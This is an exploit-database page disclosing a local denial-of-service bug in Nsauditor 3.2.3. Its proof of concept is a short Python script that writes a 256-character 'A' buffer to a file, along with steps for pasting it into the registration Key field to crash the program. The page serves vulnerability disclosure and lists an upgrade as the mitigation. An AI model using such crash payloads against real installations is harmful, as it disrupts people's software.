header-logo
Suggest Exploit
vendor:
Nsauditor
by:
Erick Galindo
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Nsauditor
Affected Version From: 3.2.3.0
Affected Version To: 3.2.3.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:nsauditor:nsauditor:3.2.3.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2021

Nsauditor 3.2.3 – Denial of Service (PoC)

Nsauditor 3.2.3 is vulnerable to a denial of service attack. An attacker can craft a malicious string of 256 A's and paste it into the 'Key' field of the 'Enter Registration Code' window. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Nsauditor.
Source

Exploit-DB raw data:

# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo 
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.3.0
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open Nsauditor.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok

buffer = "\x41" * 256

f = open ("NBM.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR